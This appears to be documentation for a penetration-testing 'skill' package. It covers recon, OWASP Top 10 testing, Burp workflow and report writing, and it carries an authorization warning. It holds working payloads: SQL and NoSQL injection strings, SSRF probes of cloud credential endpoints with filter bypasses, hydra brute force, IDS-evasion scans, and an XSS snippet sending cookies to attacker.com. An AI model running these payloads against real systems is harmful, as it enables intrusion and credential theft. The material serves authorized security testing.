Security & PasswordsDocumented
pentest-expert
Professional penetration testing methodology. OWASP Top 10 testing, SQL injection, XSS, SSRF, authentication bypass, Burp Suite workflows, nmap scanning, and professional pentest report writing. For authorized testing only.
Share:
Installation
npx clawhub@latest install pentest-expertView the full skill documentation and source below.
Documentation
Professional Penetration Testing
⚠️ Authorization Required
Only test systems you own or have written authorization to test. Unauthorized testing is illegal worldwide. Keep your scope document accessible. Never exceed defined scope.
Penetration Testing Methodology (PTES/OWASP)
1. Pre-Engagement
- Scope definition (IPs, domains, excluded systems)
- Rules of engagement (timing, methods, escalation)
- Signed authorization document
2. Intelligence Gathering / Reconnaissance
- Passive: OSINT, no direct contact with target
- Active: Direct interaction with target systems
3. Threat Modeling
- Asset identification and value
- Attack surface mapping
- Likely attack paths
4. Vulnerability Analysis
- Automated scanning
- Manual verification
- False positive elimination
5. Exploitation
- Exploit vulnerabilities (stay in scope)
- Chain exploits for realistic impact
- Document every step
6. Post-Exploitation
- Establish persistence
- Lateral movement
- Data exfiltration simulation
7. Reporting
- Executive summary
- Technical findings with severity
- Remediation guidance
- Evidence screenshots/logsReconnaissance
Passive Recon (No Target Contact)
# WHOIS and domain info
whois target.com
dig target.com ANY @8.8.8.8
dig -x 203.0.113.1 # Reverse DNS
# Subdomain enumeration
# amass is the gold standard
amass enum -d target.com -passive -o subdomains.txt
# Certificate transparency logs (reveals subdomains)
curl "https://crt.sh/?q=%.target.com&output=json" | \
jq -r '.[].name_value' | sort -u | grep -v '\*'
# TheHarvester — email, subdomains, IPs from search engines
theHarvester -d target.com -b google,bing,linkedin,hunter -l 500
# Google dorks
site:target.com filetype:pdf
site:target.com intext:"password"
site:target.com "index of /"
site:target.com ext:env OR ext:bak OR ext:config
# Shodan (internet-exposed assets)
# shodan search 'hostname:target.com'
# shodan search 'org:"Target Corporation"'
# LinkedIn/employee enumeration for social engineering scenarios
# haveibeenpwned for credential exposure checkActive Recon
# Network scanning with nmap
# Quick scan (top 1000 ports)
nmap -T4 -A target.com -oN quick_scan.txt
# Full port scan (all 65535)
nmap -p- -T4 --open target.com -oN full_ports.txt
# Service/version detection on discovered ports
nmap -sV -sC -p 22,80,443,8080,8443 target.com -oN services.txt
# UDP scan (slower, often missed)
nmap -sU -T3 --top-ports 200 target.com
# OS detection
nmap -O target.com
# Firewall/IDS evasion techniques
nmap -sS -T2 -f --data-length 24 target.com # Fragmented, slow
nmap --scan-delay 1s target.com
# Web technology fingerprinting
whatweb https://target.com
wappalyzer # Browser extension
curl -I https://target.com # HTTP headers reveal server, framework
# Directory/file enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt -t 50 -o gobuster.txt
ffuf -w wordlist.txt -u https://target.com/FUZZ -mc 200,301,302,401,403Web Application Testing (OWASP Top 10)
A01: Broken Access Control
# Test for IDOR (Insecure Direct Object Reference)
# If /api/users/123 returns your data, try:
curl -H "Authorization: Bearer YOUR_TOKEN" https://target.com/api/users/124
curl -H "Authorization: Bearer YOUR_TOKEN" https://target.com/api/users/1
# Horizontal privilege escalation
# Login as user A, try to access user B's resources
# Change: ?user_id=B, /user/B/profile, {"user_id": "B"}
# Vertical privilege escalation
# Login as regular user, try admin endpoints:
curl https://target.com/api/admin/users
curl https://target.com/admin/
curl https://target.com/api/v1/settings
# JWT manipulation
# Decode: echo "eyJ..." | base64 -d
# Algorithm confusion: change alg to "none"
# Key confusion: try signing HS256 with public RSA key
# Forced browsing
gobuster dir -u https://target.com -w admin_wordlist.txtA02: Cryptographic Failures
# Check for HTTPS everywhere
curl -I http://target.com # Should redirect to HTTPS
# SSL/TLS testing
sslyze --regular target.com
testssl.sh target.com
nmap --script ssl-enum-ciphers -p 443 target.com
# Look for weak protocols
# TLS 1.0/1.1 should be disabled
# SSLv2/v3 must be disabled
# Check for BEAST, POODLE, Heartbleed
# Check headers
curl -I https://target.com | grep -i "strict-transport\|content-security\|x-frame\|x-content-type"A03: SQL Injection
# Manual testing
# Add ' to parameters, look for errors
https://target.com/product?id=1'
https://target.com/search?q=test'--
# Time-based blind SQLi
https://target.com/product?id=1 AND SLEEP(5)--
https://target.com/product?id=1'; WAITFOR DELAY '0:0:5'-- # MSSQL
# Boolean-based blind
https://target.com/product?id=1 AND 1=1 # Returns result
https://target.com/product?id=1 AND 1=2 # Returns no result
# Automated with sqlmap (use responsibly)
sqlmap -u "https://target.com/product?id=1" --dbs --batch
sqlmap -u "https://target.com/product?id=1" -D mydb --tables --batch
sqlmap -r request.txt --level=3 --risk=2 # From Burp saved request
# NoSQL injection
{"username": {"$ne": null}, "password": {"$ne": null}} # MongoDB bypass
{"$where": "sleep(5000)"} # MongoDB time-basedA07: Authentication Failures
# Default credentials
admin/admin, admin/password, admin/123456
root/root, test/test, guest/guest
# Brute force with hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
# Check account enumeration
# Does "user not found" vs "wrong password" reveal valid users?
# Password reset flaws
# Predictable tokens (sequential IDs, low entropy)
# Token reuse (same token works after use)
# Token expiry (does old token still work?)
# Host header injection in reset emails:
curl -X POST https://target.com/api/password-reset \
-H "Host: attacker.com" \
-d '{"email": "[email protected]"}'
# Session management
# Cookie flags: Secure, HttpOnly, SameSite=Strict
curl -I https://target.com/login # Check Set-Cookie header
# Test cookie theft: no HttpOnly = XSS can steal cookies
# Test CSRF: no SameSite/no token = CSRF vulnerable
# MFA bypass
# Try response manipulation: change {"mfa_required": true} to false
# Replay old OTP codes
# Test backup codesA10: SSRF (Server-Side Request Forgery)
# Any parameter that takes a URL is a potential SSRF target
https://target.com/api/fetch?url=https://internal.service
# Try internal endpoints
url=http://localhost/admin
url=http://169.254.169.254/latest/meta-data/ # AWS metadata
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
url=http://metadata.google.internal/computeMetadata/v1/ # GCP
url=http://100.100.100.200/latest/meta-data/ # Alibaba Cloud
# Bypass filters
url=http://127.0.0.1:8080
url=http://[::1]:8080 # IPv6 localhost
url=http://0177.0.0.1/ # Octal
url=http://0x7f000001/ # Hex
url=http://localhost.attacker.com/ # DNS rebinding
# Use Burp Collaborator or requestbin.com for blind SSRF
url=https://your-collaborator.burpcollaborator.net/Burp Suite Workflow
1. Set browser proxy → 127.0.0.1:8080
2. Install Burp CA certificate (trust it)
3. Browse target normally → intercept traffic
Key tabs:
Proxy → Intercept/modify requests in-flight
Repeater → Manually resend and modify requests
Intruder → Automated fuzzing (rate-limited on Community)
Scanner → Automated vulnerability scanning (Pro)
Extensions → BApp store (add-ons)
Essential workflow:
- Map: browse all functionality, let Proxy capture
- Analyze: review requests in HTTP history
- Test: Send interesting requests to Repeater
- Fuzz: Use Intruder for parameter fuzzing
Pro extensions worth using:
- ActiveScan++ — enhanced scanner
- Logger++ — better logging
- Turbo Intruder — high-speed fuzzing
- JWT Editor — JWT manipulationXSS Testing
// Basic test payloads (HTML context)
"><script>alert(1)</script>
<img src=x onerror=alert(1)>
javascript:alert(1)
// Bypass filters
<ScRiPt>alert(1)</sCrIpT> // Case variation
<svg onload=alert(1)> // SVG tag
<details/open/ontoggle=alert(1)> // Less common event
"><img src=1 onerror=alert(1)> // HTML entity
eval(String.fromCharCode(97,108,101,114,116,40,49,41)) // Char codes
// JavaScript context (if output is inside JS)
';alert(1);//
\';alert(1);//
// Stored XSS impact demonstration (cookie theft)
<script>
fetch('https://attacker.com/steal?c=' + encodeURIComponent(document.cookie))
</script>
// DOM XSS
location.hash, document.URL, document.referrer
// Test: https://target.com/#"><img src=x onerror=alert(1)>Penetration Test Report Structure
# Penetration Test Report
**Target:** target.com
**Test Period:** 2024-01-15 to 2024-01-19
**Conducted By:** [Tester Name]
**Classification:** CONFIDENTIAL
## Executive Summary
[Non-technical summary for management. Key findings, risk level, most critical issues.]
## Scope
- In scope: *.target.com, 192.168.1.0/24
- Out of scope: target-prod.com, third-party integrations
## Summary of Findings
| ID | Title | Severity | CVSS | Status |
|----|-------|----------|------|--------|
| F-01 | SQL Injection in /search | Critical | 9.8 | Open |
| F-02 | Stored XSS in Comments | High | 7.5 | Open |
| F-03 | Missing Security Headers | Medium | 5.3 | Open |
## Detailed Findings
### F-01: SQL Injection in /search
**Severity:** Critical (CVSS 9.8)
**Affected URL:** https://target.com/search?q=
**Description:**
The search parameter is directly interpolated into a SQL query without parameterization.
**Evidence:**
Request:Response: 5-second delay observed (time-based blind SQLi confirmed)
**Impact:**
Full database read/write access. Potential OS command execution via xp_cmdshell.
**Remediation:**
Use parameterized queries / prepared statements:Vulnerable
cursor.execute(f"SELECT * FROM products WHERE name = '{q}'")Fixed
cursor.execute("SELECT * FROM products WHERE name = %s", (q,))Severity Rating (CVSS v3.1)
| Rating | CVSS Score | Examples |
| Critical | 9.0-10.0 | Unauthenticated RCE, SQL injection with data exfil |
| High | 7.0-8.9 | Auth bypass, SSRF with AWS credential access, stored XSS |
| Medium | 4.0-6.9 | CSRF, reflected XSS, info disclosure |
| Low | 0.1-3.9 | Missing headers, verbose errors |
| Informational | 0.0 | Best practice recommendations |